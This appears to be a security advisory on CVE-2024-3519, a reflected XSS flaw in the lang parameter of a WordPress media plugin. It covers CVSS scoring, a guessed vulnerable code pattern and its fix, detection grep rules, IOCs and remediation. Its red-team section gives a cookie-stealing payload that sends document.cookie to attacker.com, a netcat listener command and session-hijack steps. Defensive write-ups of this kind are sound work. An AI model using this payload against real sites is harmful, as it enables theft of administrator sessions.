CVE-2024-3519
Executive Summary
CVE-2024-3519 is a Reflected Cross-Site Scripting (XSS) vulnerability in the Media Library Assistant plugin for WordPress, affecting all versions up to and including 3.15. The flaw resides in the lang parameter, which is insufficiently sanitized and escaped before being reflected back to the user. An unauthenticated attacker can craft a malicious link that, when clicked by a logged-in administrator or editor, executes arbitrary JavaScript in the context of the WordPress admin dashboard. This can lead to session hijacking, privilege escalation, or defacement. The vulnerability has a CVSS score of 6.1 (Medium) and no public exploit code or patch is currently available.

Supply Chain & Package Security
This vulnerability affects a WordPress plugin distributed via the official WordPress plugin repository. Users are advised to monitor the plugin’s update channel and apply any security patches as soon as they are released. Since the plugin is not an NPM, PyPI, Go, or Ruby package, no additional supply chain risks are identified beyond the standard WordPress ecosystem.
CVSS Breakdown & Threat Level
- Attack Vector (AV): Network (N) – The attack is launched remotely.
- Attack Complexity (AC): Low (L) – No special conditions are required.
- Privileges Required (PR): None (N) – No authentication needed to trigger the vulnerability.
- User Interaction (UI): Required (R) – The victim must click a crafted link.
- Scope (S): Changed (C) – The vulnerable component impacts resources beyond its security scope.
- Confidentiality (C): Low (L) – Limited data exposure possible.
- Integrity (I): Low (L) – Limited modification of data possible.
- Availability (A): None (N) – No impact on availability.
Threat Level: Medium. The requirement for user interaction reduces the immediate risk, but the lack of authentication and the potential for privilege escalation in the WordPress admin context make this a significant threat for targeted attacks.
Deep Dive & Mechanics
The vulnerability is a classic Reflected XSS in the WordPress plugin Media Library Assistant. The lang parameter is used to set the language for the plugin’s interface. The plugin fails to properly sanitize and escape this parameter before outputting it in the HTML response. An attacker can inject a payload such as:
?lang=en"><script>alert('XSS')</script>
When a user clicks a crafted link containing this payload, the browser executes the injected script. Because the script runs in the context of the WordPress admin dashboard, it can access cookies, session tokens, and perform actions on behalf of the victim.
The vulnerability is present in all versions up to and including 3.15. No patch has been released as of the time of analysis.
Vulnerable vs. Patched Code
Since no patch is available, we can only describe the vulnerable code pattern. The vulnerable code likely appears in a PHP file that handles the lang parameter, such as:
// Vulnerable code (example)
$lang = $_GET['lang'];
echo "<div class=\"mla-lang\">" . $lang . "</div>";
A patched version would use proper escaping:
// Patched code (example)
$lang = sanitize_text_field($_GET['lang']);
echo "<div class=\"mla-lang\">" . esc_html($lang) . "</div>";
The sanitize_text_field() function removes dangerous characters, and esc_html() ensures the output is safe for HTML context.
Exploitation & Lab Setup
Red Team (Attacker)
Craft the malicious URL:
http://target-site.com/wp-admin/admin.php?page=mla-settings&lang=en"><script>new Image().src='http://attacker.com/steal.php?cookie='+document.cookie</script>Deliver the link via email, social engineering, or a compromised third-party site.
Set up a listener on the attacker’s server to capture cookies:
nc -lvnp 80Use the stolen cookie to hijack the victim’s session.
Blue Team (Defender)
Monitor for suspicious
langparameter values in web server logs:grep -E "lang=.*<script" /var/log/apache2/access.logImplement a Web Application Firewall (WAF) rule to block XSS payloads in the
langparameter.Educate users about not clicking suspicious links, especially those containing query parameters.
Indicators of Compromise (IOCs)
- URL patterns:
?lang=*<scriptor?lang=*%3Cscript - Web server logs: Entries containing
langparameter with HTML tags or JavaScript code. - Network traffic: Outbound connections to attacker-controlled domains from the WordPress admin dashboard.
- File changes: Unexpected modifications to WordPress core files or plugin files (e.g.,
wp-config.php).

Remediation & Mitigation
- Immediate Action: Disable the Media Library Assistant plugin until a patch is released.
- Short-term: Implement a WAF rule to block XSS payloads in the
langparameter. - Long-term: Apply the official patch from the plugin vendor as soon as it becomes available.
- User Training: Educate administrators and editors about the risks of clicking untrusted links.
- Monitoring: Continuously monitor web server logs for suspicious
langparameter values.
